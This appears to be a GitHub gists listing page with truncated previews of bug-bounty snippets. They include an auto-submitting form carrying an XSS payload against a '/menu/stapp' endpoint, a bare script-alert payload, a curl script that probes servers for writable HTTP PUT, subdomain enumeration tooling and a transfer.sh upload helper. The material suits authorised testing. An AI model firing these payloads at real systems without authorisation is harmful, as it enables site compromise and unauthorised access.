This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
! | |
" | |
# | |
$ | |
% | |
& | |
' | |
( | |
) | |
* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<form name=TheForm action=https://HOSTNAME/menu/stapp method=post> | |
<input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'> | |
</form> | |
<script> | |
document.TheForm.submit(); | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(1337)</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# script for subdomain enumeration using 4 of the best tools with some APIs: | |
# * findomain: https://github.com/Edu4rdSHL/findomain | |
# * SubFinder: https://github.com/projectdiscovery/subfinder | |
# * Amass: https://github.com/OWASP/Amass | |
# * AssetFinder: https://github.com/tomnomnom/assetfinder | |
# | |
# a perl version is being developed by @terminalforlife | |
# * https://github.com/terminalforlife/PerlProjects/tree/master/source/dominator |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
PUT() { | |
curl -sk -XPUT "$1/bing0o.txt" -H "User-Agent: Mozilla/5.0" -d "bing0o Haxor PUT method" &>/dev/null | |
res=$(curl -sk "$1/bing0o.txt") | |
if [[ "$res" =~ "bing0o Haxor PUT method" ]] | |
then | |
echo "Vulnerable: $1/bing0o.txt" | tee -a "$2" | |
fi | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import hashlib | |
from optparse import * | |
class colors: | |
def __init__(self): | |
self.blue = "\033[94m" | |
self.red = "\033[91m" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
Usage(){ | |
echo -e "$blue | |
#Options: | |
\r -l, --list - List of Assets. | |
\r -u, --use - Use a Specific Function (split/probe). | |
\r -t, --thread - Thread Number For HTTProbe. | |
\r -n, --number - The Number of How Many Hosts in Each Part. | |
\r -o, --output - The output Directory to save the Results. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
transfer() { | |
[ -z "$1" ] && { echo "Usage: ./transfer file.txt"; exit 1; } | |
[ -z "$2" ] && fl=${1##*/} || fl=$2 | |
curl --upload-file $1 https://transfer.sh/$fl | |
} | |
transfer |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cloud-av.com | |
gearheadsupport.com | |
leafnetworks.net | |
mynetgear.net | |
myreadynas.com | |
mystora.com | |
mystora.net | |
mywifiext.com | |
mywifiext.net | |
mywifiextender.net |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
usage() { | |
echo -e " | |
#Options: | |
-f, --file\t the domains list file | |
-t, --thread\t the threads number | |
-w, --wordlist\t the wordlist | |
-o, --output\t the output directory |
NewerOlder